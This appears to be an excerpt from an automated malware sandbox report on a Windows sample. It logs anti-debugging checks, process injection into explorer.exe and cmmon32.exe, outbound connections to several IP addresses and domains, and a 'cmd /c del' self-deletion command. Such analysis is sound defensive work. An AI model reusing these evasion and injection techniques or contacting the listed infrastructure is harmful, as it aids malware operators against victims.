          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103BC2C mov eax, dword ptr fs:[00000030h]3_2_0103BC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A44B mov eax, dword ptr fs:[00000030h]3_2_0103A44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109C450 mov eax, dword ptr fs:[00000030h]3_2_0109C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109C450 mov eax, dword ptr fs:[00000030h]3_2_0109C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102746D mov eax, dword ptr fs:[00000030h]3_2_0102746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103AC7B mov eax, dword ptr fs:[00000030h]3_2_0103AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101849B mov eax, dword ptr fs:[00000030h]3_2_0101849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4496 mov eax, dword ptr fs:[00000030h]3_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8CD6 mov eax, dword ptr fs:[00000030h]3_2_010D8CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C14FB mov eax, dword ptr fs:[00000030h]3_2_010C14FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086CF0 mov eax, dword ptr fs:[00000030h]3_2_01086CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D070D mov eax, dword ptr fs:[00000030h]3_2_010D070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D070D mov eax, dword ptr fs:[00000030h]3_2_010D070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A70E mov eax, dword ptr fs:[00000030h]3_2_0103A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A70E mov eax, dword ptr fs:[00000030h]3_2_0103A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102F716 mov eax, dword ptr fs:[00000030h]3_2_0102F716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FF10 mov eax, dword ptr fs:[00000030h]3_2_0109FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FF10 mov eax, dword ptr fs:[00000030h]3_2_0109FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01004F2E mov eax, dword ptr fs:[00000030h]3_2_01004F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01004F2E mov eax, dword ptr fs:[00000030h]3_2_01004F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103E730 mov eax, dword ptr fs:[00000030h]3_2_0103E730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B73D mov eax, dword ptr fs:[00000030h]3_2_0102B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B73D mov eax, dword ptr fs:[00000030h]3_2_0102B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101EF40 mov eax, dword ptr fs:[00000030h]3_2_0101EF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101FF60 mov eax, dword ptr fs:[00000030h]3_2_0101FF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8F6A mov eax, dword ptr fs:[00000030h]3_2_010D8F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01018794 mov eax, dword ptr fs:[00000030h]3_2_01018794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087794 mov eax, dword ptr fs:[00000030h]3_2_01087794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010437F5 mov eax, dword ptr fs:[00000030h]3_2_010437F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C600 mov eax, dword ptr fs:[00000030h]3_2_0100C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01038E00 mov eax, dword ptr fs:[00000030h]3_2_01038E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1608 mov eax, dword ptr fs:[00000030h]3_2_010C1608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A61C mov eax, dword ptr fs:[00000030h]3_2_0103A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A61C mov eax, dword ptr fs:[00000030h]3_2_0103A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100E620 mov eax, dword ptr fs:[00000030h]3_2_0100E620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFE3F mov eax, dword ptr fs:[00000030h]3_2_010BFE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01017E41 mov eax, dword ptr fs:[00000030h]3_2_01017E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE44 mov eax, dword ptr fs:[00000030h]3_2_010CAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAE44 mov eax, dword ptr fs:[00000030h]3_2_010CAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101766D mov eax, dword ptr fs:[00000030h]3_2_0101766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AE73 mov eax, dword ptr fs:[00000030h]3_2_0102AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109FE87 mov eax, dword ptr fs:[00000030h]3_2_0109FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D0EA5 mov eax, dword ptr fs:[00000030h]3_2_010D0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010846A7 mov eax, dword ptr fs:[00000030h]3_2_010846A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01048EC7 mov eax, dword ptr fs:[00000030h]3_2_01048EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFEC0 mov eax, dword ptr fs:[00000030h]3_2_010BFEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010336CC mov eax, dword ptr fs:[00000030h]3_2_010336CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8ED6 mov eax, dword ptr fs:[00000030h]3_2_010D8ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010316E0 mov ecx, dword ptr fs:[00000030h]3_2_010316E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010176E2 mov eax, dword ptr fs:[00000030h]3_2_010176E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 156.242.168.70 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.desipizza.uk
          Source: C:\Windows\explorer.exeDomain query: www.hblcfl.com
          Source: C:\Windows\explorer.exeDomain query: www.anbietertest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.140.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1030000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000003.537796204.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.573217312.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.568505299.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.340666473.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.339990008.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
